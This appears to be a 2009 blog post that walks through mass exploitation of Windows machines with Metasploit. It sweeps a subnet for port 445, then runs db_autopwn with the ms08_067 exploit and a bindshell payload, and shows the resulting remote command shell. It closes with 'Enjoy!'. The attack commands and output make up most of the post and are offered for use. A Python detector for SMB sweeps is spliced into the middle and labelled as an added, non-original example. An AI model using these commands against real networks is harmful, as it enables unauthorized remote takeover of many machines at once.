Mass exploitation with Metasploit

Posted on 14. Dec, 2009 in Uncategorized


To help reduce ignorance about hacking, this time Kang Nadoel, who considers himself a Subang native, a Sundanese, and also a fan of Doel Sumbang, wants to share how to exploit a Windows weakness using Metasploit.

msf > load db_sqlite3
[*] Successfully loaded plugin: db_sqlite3

Next we will use the db_create command to initialize a new SQLite3 database and connect it to the Metasploit Framework instance:

msf > db_create
[*] The specified database already exists, connecting
[*] Successfully connected to the database
[*] File: /root/.msf3/sqlite3.db

To speed up our test, we will use the db_nmap command with a very narrow set of search requirements. In this case, we want to find every machine with port 445 open on the target subnet. One of the quickest ways to accomplish this is by using the flag combination below:

msf > db_nmap -sS -PS445 -p445 -n -T Aggressive AAA.BBB.CCC.0/24
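Seen from the defended network, the sweep above is one source sending SYNs to TCP/445 on many hosts of the same subnet within seconds. The following is an added example, not part of the original post: a small detector for that pattern. The log format, the addresses (documentation range 192.0.2.0/24), the host roles and the thresholds are all assumptions made for illustration.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Hypothetical log format: "2009-12-14T10:00:01 SRC=a DST=b PROTO=TCP DPT=445 FLAGS=SYN"
LINE_RE = re.compile(r"^(\S+) SRC=(\S+) DST=(\S+) PROTO=TCP DPT=(\d+) FLAGS=SYN$")

def build_sample_log():
    """Constructed sample data using documentation addresses (192.0.2.0/24)."""
    t0 = datetime(2009, 12, 14, 10, 0, 0)
    fmt = "{} SRC={} DST={} PROTO=TCP DPT={} FLAGS=SYN"
    lines = []
    for i in range(1, 41):   # one source, 40 hosts on TCP/445, one per second
        ts = (t0 + timedelta(seconds=i)).isoformat()
        lines.append(fmt.format(ts, "192.0.2.11", f"192.0.2.{50 + i}", 445))
    for i in range(5):       # a client reusing one file server: normal SMB
        ts = (t0 + timedelta(seconds=7 * i)).isoformat()
        lines.append(fmt.format(ts, "192.0.2.20", "192.0.2.5", 445))
    for i in range(25):      # a management host polling one machine every 10 minutes
        ts = (t0 + timedelta(minutes=10 * i)).isoformat()
        lines.append(fmt.format(ts, "192.0.2.30", f"192.0.2.{100 + i}", 445))
    lines.append(fmt.format(t0.isoformat(), "192.0.2.11", "192.0.2.5", 80))
    return lines

def find_smb_sweeps(lines, min_hosts=20, window=timedelta(seconds=60)):
    """Map each source to its peak count of distinct TCP/445 destinations
    inside any sliding window, keeping only sources reaching min_hosts."""
    events = defaultdict(list)
    for line in lines:
        m = LINE_RE.match(line.strip())
        if m and m.group(4) == "445":
            events[m.group(2)].append((datetime.fromisoformat(m.group(1)), m.group(3)))
    alerts = {}
    for src, evs in events.items():
        evs.sort()
        start, best, in_window = 0, 0, defaultdict(int)
        for ts, dst in evs:
            in_window[dst] += 1
            while ts - evs[start][0] > window:   # expire events older than the window
                old = evs[start][1]
                in_window[old] -= 1
                if in_window[old] == 0:
                    del in_window[old]
                start += 1
            best = max(best, len(in_window))
        if best >= min_hosts:
            alerts[src] = best
    return alerts

if __name__ == "__main__":
    for src, hosts in find_smb_sweeps(build_sample_log()).items():
        print(f"possible SMB sweep: {src} reached {hosts} hosts on TCP/445")
```

Sources that legitimately touch many hosts on TCP/445, such as an authorized vulnerability scanner or a backup server, need an allowlist before this kind of rule is used for alerting.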

Finally, we execute the db_autopwn command, with the -e option to specify exploitation, the -p option to specify port-based matching, the -b option to select the bindshell payload, and the -m option to only run modules with the string "ms08_067" in their name:

msf > db_autopwn -e -p -b -m ms08_067

Once this command completes, we can use the sessions -l command to list the active shells. Use the sessions -i [SID] command to interact with a given session.

msf > sessions -l
Active sessions
===============
Id  Description    Tunnel
--  -----------    ------
1   Command shell  AAA.BBB.CCC.11 -> AAA.BBB.CCC.86

msf > sessions -i 1
[*] Starting interaction with 1...
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>

Enjoy!
